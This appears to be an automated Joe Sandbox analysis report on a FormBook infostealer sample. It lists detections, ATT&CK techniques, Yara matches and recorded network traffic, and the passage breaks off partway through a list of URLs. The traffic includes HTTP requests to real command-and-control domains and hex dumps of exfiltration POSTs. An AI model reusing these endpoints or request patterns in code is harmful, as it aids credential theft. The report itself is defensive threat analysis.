Play interactive tourEdit tour

Analysis Report Scan_Doc_11052020.exe

Overview

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
 Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
 Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Software Packing1Credential Dumping1Security Software Discovery231Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution1Port MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingFile and Directory Discovery2Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery112Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesVirtualization/Sandbox Evasion3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

AV Detection:

 Antivirus detection for URL or domain Show sources
 Source: http://www.brandbank.news/mq3/ Avira URL Cloud: Label: malware Source: http://www.brandbank.news/mq3/www.shimi783.info Avira URL Cloud: Label: malware Source: http://www.brandbank.news Avira URL Cloud: Label: malware
 Multi AV Scanner detection for domain / URL Show sources
 Source: http://www.porcber.com Virustotal: Detection: 6% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe Virustotal: Detection: 19% Perma Link Source: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe ReversingLabs: Detection: 35%
 Multi AV Scanner detection for submitted file Show sources
 Source: Scan_Doc_11052020.exe Virustotal: Detection: 19% Perma Link Source: Scan_Doc_11052020.exe ReversingLabs: Detection: 35%
 Yara detected FormBook Show sources
 Source: Yara match File source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1Host: www.bzasd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1Host: www.dllearn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 50.63.202.49 50.63.202.49 Source: Joe Sandbox View IP Address: 50.63.202.49 50.63.202.49
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.dllearn.comConnection: closeContent-Length: 182834Cache-Control: no-cacheOrigin: http://www.dllearn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dllearn.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 47 54 32 50 45 68 3d 6a 65 63 42 6e 6f 6f 58 70 72 33 38 72 4c 74 6e 79 39 43 31 6c 5f 59 5a 30 2d 7e 32 37 6b 6d 6b 59 47 36 57 5a 58 73 4e 72 39 72 53 4c 50 35 53 50 6b 7e 4f 51 42 49 63 73 58 69 45 33 4b 77 79 50 59 50 64 33 2d 42 71 46 7a 70 63 41 32 31 43 5a 47 73 4e 57 47 77 56 70 71 5a 36 28 78 28 73 4d 6d 4b 33 4e 71 71 6e 6d 5a 39 77 6f 71 70 56 44 47 71 4d 61 6c 4c 61 49 74 59 43 5a 39 71 6f 4f 57 42 33 59 38 73 52 6b 65 68 6b 55 50 33 38 39 4c 43 46 57 45 77 48 76 52 42 49 30 61 78 61 45 76 4e 56 50 4f 4d 48 42 48 4d 6e 46 72 47 6b 70 33 4b 46 4a 43 53 4a 54 4a 51 6b 41 79 70 4b 30 35 4d 48 78 32 56 74 39 70 33 6e 52 65 70 71 61 42 76 77 7e 6d 79 69 52 50 78 34 74 42 6f 58 67 57 7a 5a 31 32 45 59 50 39 61 35 6b 79 41 54 6e 45 70 68 56 66 51 31 37 69 30 76 4c 70 4d 67 59 33 67 4f 6e 48 70 34 73 54 39 6b 51 33 74 52 43 41 6b 64 78 70 67 6e 49 72 32 62 33 7a 54 71 52 6c 63 68 53 5f 31 37 73 39 45 4c 35 58 7e 61 48 6e 61 68 41 6d 54 55 64 51 4d 43 41 6a 41 6a 4b 48 34 75 35 63 54 54 72 47 4d 61 69 62 55 68 6a 6b 6b 45 30 52 6c 70 61 5f 46 5f 44 69 42 37 73 45 67 50 4c 30 43 5f 7e 67 55 6e 52 66 4c 45 31 69 79 4b 44 74 64 59 6d 47 71 59 6d 75 31 35 35 32 79 78 73 5f 71 2d 45 6f 6b 78 63 61 32 76 4d 56 74 4d 41 45 73 74 6c 31 58 75 62 50 7e 31 35 4c 61 6d 53 2d 79 4b 52 35 33 65 73 59 48 51 58 35 74 52 5a 75 45 48 30 59 66 49 4d 70 37 79 79 6d 77 69 44 32 77 52 59 6b 43 57 63 76 6b 48 50 78 66 54 48 77 79 44 41 64 6e 50 43 70 6f 36 7e 47 72 58 59 52 66 31 6f 61 39 43 36 69 36 50 39 63 4e 36 4a 48 6c 42 31 66 55 35 4b 69 31 32 78 7a 33 75 72 6f 6a 77 7a 67 59 35 4b 32 6c 54 67 56 4c 36 53 70 73 79 67 5a 4b 50 66 74 65 42 43 45 43 6a 67 38 36 74 4e 68 35 51 6c 5a 6b 38 28 68 74 4c 67 50 6e 63 53 2d 64 4a 39 2d 63 7a 6c 70 39 78 57 32 67 64 58 38 78 47 4f 6c 73 4b 67 4a 78 32 28 73 62 6b 67 6a 4b 36 4d 61 4a 30 51 41 69 6b 37 62 77 53 64 78 7a 66 72 51 54 62 4e 34 78 4e 6b 30 51 56 5a 5a 67 36 34 69 70 45 49 31 59 43 73 45 69 38 68 46 6c 75 6e 70 66 5f 48 64 6a 48 4b 6d 6b 45 38 41 61 5f 53 5f 62 67 4d 5f 6c 75 4b 56 4c 4e 78 6d 66 77 74 70 6f 30 4a 6a 38 6a 54 57 32 5a 43 34 56 74 76 61 4d 4a 67 41 69 67 56 67 49 33 6d 2d 6a 5f 70 6e 44 53 62 44 4d 7a 41 6b 46 53 70 35 56 6a 46 42 45 43 48 48 37 48 7a 51 55 78 5a 33 37 44 43 7a 46 65 58 76 4f 56 71 7a 58 4a 6f 79 66 50 4f 6e 6c 73 68 62 55 61 78 58 7e 73 64 4c 54 6d 73 48 66 31 63 37 36 37 5a 75 46 61 67 59 58 57 6b 6a 6a 76 66 56 57 73 45 39 35 74 79 58 48 67 7e 74 74 46 6d 70 52 53 53 6b 38 4f 48 4d 66 72 63 41 69 73 6c 57 33 6f 54 72 31 52 74 7a 33 68 76 6a 6d 4f 33 5f 28 32 47 72 28 79 69 7a 5 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.axcyl.comConnection: closeContent-Length: 182834Cache-Control: no-cacheOrigin: http://www.axcyl.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.axcyl.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 47 54 32 50 45 68 3d 63 2d 73 43 57 37 32 6d 30 7a 79 4b 55 34 28 5a 52 49 5a 75 45 58 77 63 7e 68 30 6f 44 76 4a 48 4a 68 73 53 43 78 71 74 61 43 6e 34 28 54 67 6e 54 74 5a 47 6f 6d 33 70 51 6e 34 47 59 65 70 32 64 73 79 41 4f 41 28 69 59 45 4a 6c 76 37 56 72 6f 75 4c 42 31 71 6b 4b 30 53 72 43 6e 70 39 52 37 71 4b 34 62 56 76 6e 73 56 68 33 47 51 57 41 38 43 79 66 44 38 73 62 54 37 67 33 72 64 51 45 6c 52 6b 34 54 58 45 6a 4f 35 62 48 43 46 6f 54 69 52 41 6d 65 2d 30 63 45 78 36 75 7e 56 4f 4a 39 78 34 4d 52 6b 36 35 75 57 4a 45 74 58 50 53 6a 75 59 6e 28 75 51 59 4e 61 69 6a 4c 79 58 4a 79 64 41 30 63 52 52 49 33 76 58 45 44 52 5a 70 68 71 5a 78 4b 54 70 37 56 7a 67 58 73 6d 6c 4e 28 35 48 36 5a 39 37 47 64 5a 6b 6a 32 64 43 56 7a 65 66 44 39 33 48 71 72 35 70 56 4f 7a 57 42 53 32 53 34 79 4b 70 75 34 66 6d 49 28 30 56 63 55 6b 67 61 7a 54 35 4f 54 75 73 54 51 71 7e 6d 74 2d 5a 4b 4d 4f 4f 49 42 48 63 35 6b 45 69 33 68 59 56 54 4b 33 63 4f 39 59 64 34 48 62 34 6a 4f 79 4c 32 59 6a 41 7a 59 63 4e 50 32 50 7e 45 4d 66 38 77 50 58 7e 57 72 35 4e 6c 45 67 5a 36 4e 43 49 72 77 4e 74 50 64 4e 4c 56 66 76 7e 72 30 6d 56 4a 4f 42 69 71 56 68 72 6d 4e 64 5a 4d 38 2d 67 6c 74 6d 49 6c 32 4a 46 79 43 47 70 52 58 37 6b 6d 71 33 37 52 72 32 71 46 35 32 6c 4e 71 4d 56 36 76 79 66 46 61 35 6a 4d 42 48 61 7a 56 7a 34 34 44 30 53 75 79 37 61 69 51 67 44 53 4d 45 44 61 55 33 75 43 62 75 54 73 66 35 76 78 73 44 46 4f 6f 50 75 6b 4c 46 42 6e 43 6d 51 69 50 74 37 53 74 75 33 6e 33 30 4d 74 59 42 76 41 45 32 56 52 43 57 73 44 6d 30 73 42 57 75 4d 36 48 51 30 6a 44 77 74 51 58 30 57 4c 53 33 4a 7a 6b 31 4e 53 75 59 4f 6c 53 61 45 6e 75 77 6d 79 39 75 72 72 57 5a 32 4c 46 5a 77 6c 38 5a 54 73 71 55 53 37 45 37 4a 5f 53 54 52 6f 52 4c 56 48 38 68 69 56 57 6a 61 42 57 4c 6a 59 36 64 4b 6e 45 44 30 6e 30 6f 4c 5f 28 2d 58 55 63 53 34 46 52 75 38 34 4f 32 61 31 33 68 55 61 74 70 46 58 30 66 54 57 59 4a 78 5a 51 64 39 64 41 6d 32 6d 76 4c 4c 4a 63 44 69 77 76 57 65 4f 66 53 34 6c 78 34 46 67 7e 4d 42 46 28 66 66 4c 66 59 57 6e 54 67 66 69 37 79 77 58 63 33 78 4e 4b 59 48 42 37 51 52 73 33 6d 33 4f 62 5f 54 7a 42 66 73 36 50 38 35 64 49 4e 69 78 6d 42 61 56 6f 78 59 33 57 67 53 57 45 48 33 31 55 61 41 70 67 2d 7a 37 6b 2d 52 4c 6d 7a 7a 61 4a 34 72 45 69 2d 56 4b 75 5f 53 56 39 6f 61 30 66 51 38 46 36 7a 7a 6e 36 43 64 4e 58 71 42 58 35 6f 62 73 61 41 6e 4a 49 41 64 4d 4f 57 53 59 61 43 6a 68 62 31 41 58 6f 31 35 41 74 4c 7a 6d 7e 36 54 79 73 79 46 77 54 55 38 4b 7a 30 78 6d 66 38 67 31 51 74 57 6e 51 63 28 42 6e 77 72 6d 59 4a 76 75 4c 4f 77 4d 34 51 6b 62 30 48 6a 33 77 74 5a 6b 4
 Source: global traffic HTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Rok90QOK6ea72UleUAJ4ErWaSqt/IQVB8JdCNgRpDbdf1LJgzNf1D86eRIdXJU+axZ+t HTTP/1.1Host: www.bzasd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?SXGT2PEh=r8Q75MIXz7zy5sB899Th1/k9+Lnr+VmPBQzoNFk56PWTbuYDB27UYmJg83KfwIIDO73Z&fDK=BhjLRlh HTTP/1.1Host: www.dllearn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?fDK=BhjLRlh&SXGT2PEh=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.bzasd.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.dllearn.comConnection: closeContent-Length: 182834Cache-Control: no-cacheOrigin: http://www.dllearn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dllearn.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 47 54 32 50 45 68 3d 6a 65 63 42 6e 6f 6f 58 70 72 33 38 72 4c 74 6e 79 39 43 31 6c 5f 59 5a 30 2d 7e 32 37 6b 6d 6b 59 47 36 57 5a 58 73 4e 72 39 72 53 4c 50 35 53 50 6b 7e 4f 51 42 49 63 73 58 69 45 33 4b 77 79 50 59 50 64 33 2d 42 71 46 7a 70 63 41 32 31 43 5a 47 73 4e 57 47 77 56 70 71 5a 36 28 78 28 73 4d 6d 4b 33 4e 71 71 6e 6d 5a 39 77 6f 71 70 56 44 47 71 4d 61 6c 4c 61 49 74 59 43 5a 39 71 6f 4f 57 42 33 59 38 73 52 6b 65 68 6b 55 50 33 38 39 4c 43 46 57 45 77 48 76 52 42 49 30 61 78 61 45 76 4e 56 50 4f 4d 48 42 48 4d 6e 46 72 47 6b 70 33 4b 46 4a 43 53 4a 54 4a 51 6b 41 79 70 4b 30 35 4d 48 78 32 56 74 39 70 33 6e 52 65 70 71 61 42 76 77 7e 6d 79 69 52 50 78 34 74 42 6f 58 67 57 7a 5a 31 32 45 59 50 39 61 35 6b 79 41 54 6e 45 70 68 56 66 51 31 37 69 30 76 4c 70 4d 67 59 33 67 4f 6e 48 70 34 73 54 39 6b 51 33 74 52 43 41 6b 64 78 70 67 6e 49 72 32 62 33 7a 54 71 52 6c 63 68 53 5f 31 37 73 39 45 4c 35 58 7e 61 48 6e 61 68 41 6d 54 55 64 51 4d 43 41 6a 41 6a 4b 48 34 75 35 63 54 54 72 47 4d 61 69 62 55 68 6a 6b 6b 45 30 52 6c 70 61 5f 46 5f 44 69 42 37 73 45 67 50 4c 30 43 5f 7e 67 55 6e 52 66 4c 45 31 69 79 4b 44 74 64 59 6d 47 71 59 6d 75 31 35 35 32 79 78 73 5f 71 2d 45 6f 6b 78 63 61 32 76 4d 56 74 4d 41 45 73 74 6c 31 58 75 62 50 7e 31 35 4c 61 6d 53 2d 79 4b 52 35 33 65 73 59 48 51 58 35 74 52 5a 75 45 48 30 59 66 49 4d 70 37 79 79 6d 77 69 44 32 77 52 59 6b 43 57 63 76 6b 48 50 78 66 54 48 77 79 44 41 64 6e 50 43 70 6f 36 7e 47 72 58 59 52 66 31 6f 61 39 43 36 69 36 50 39 63 4e 36 4a 48 6c 42 31 66 55 35 4b 69 31 32 78 7a 33 75 72 6f 6a 77 7a 67 59 35 4b 32 6c 54 67 56 4c 36 53 70 73 79 67 5a 4b 50 66 74 65 42 43 45 43 6a 67 38 36 74 4e 68 35 51 6c 5a 6b 38 28 68 74 4c 67 50 6e 63 53 2d 64 4a 39 2d 63 7a 6c 70 39 78 57 32 67 64 58 38 78 47 4f 6c 73 4b 67 4a 78 32 28 73 62 6b 67 6a 4b 36 4d 61 4a 30 51 41 69 6b 37 62 77 53 64 78 7a 66 72 51 54 62 4e 34 78 4e 6b 30 51 56 5a 5a 67 36 34 69 70 45 49 31 59 43 73 45 69 38 68 46 6c 75 6e 70 66 5f 48 64 6a 48 4b 6d 6b 45 38 41 61 5f 53 5f 62 67 4d 5f 6c 75 4b 56 4c 4e 78 6d 66 77 74 70 6f 30 4a 6a 38 6a 54 57 32 5a 43 34 56 74 76 61 4d 4a 67 41 69 67 56 67 49 33 6d 2d 6a 5f 70 6e 44 53 62 44 4d 7a 41 6b 46 53 70 35 56 6a 46 42 45 43 48 48 37 48 7a 51 55 78 5a 33 37 44 43 7a 46 65 58 76 4f 56 71 7a 58 4a 6f 79 66 50 4f 6e 6c 73 68 62 55 61 78 58 7e 73 64 4c 54 6d 73 48 66 31 63 37 36 37 5a 75 46 61 67 59 58 57 6b 6a 6a 76 66 56 57 73 45 39 35 74 79 58 48 67 7e 74 74 46 6d 70 52 53 53 6b 38 4f 48 4d 66 72 63 41 69 73 6c 57 33 6f 54 72 31 52 74 7a 33 68 76 6a 6d 4f 33 5f 28 32 47 72 28 79 69 7a 5
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 May 2020 01:20:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 35 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6d 69 70 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 70 63 61 63 68 65 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 6d 69 70 2e 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 6d 69 70 2d 63 75 73 74 6f 6d 3e 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 73 70 61 6e 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 70 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 61 61 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 2e 65 72 72 6f 72 4d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 20 61 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 61 61 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000002.00000000.815949561.0000000007B92000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp, systray.exe, 00000004.00000002.1201355608.00000000053E9000.00000004.00000001.sdmp String found in binary or memory: http://www.axcyl.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp, systray.exe, 00000004.00000002.1201355608.00000000053E9000.00000004.00000001.sdmp String found in binary or memory: http://www.axcyl.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.axcyl.com/mq3/www.samdeng.works Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.axcyl.comReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.brandbank.news Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.brandbank.news/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.brandbank.news/mq3/www.shimi783.info Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.brandbank.newsReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bridgejfc.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bridgejfc.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bridgejfc.com/mq3/www.porcber.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bridgejfc.comReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bzasd.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bzasd.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bzasd.com/mq3/www.dllearn.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.bzasd.comReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.carnescolombia.services Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.carnescolombia.services/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.carnescolombia.services/mq3/www.bridgejfc.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.carnescolombia.servicesReferer: Source: explorer.exe, 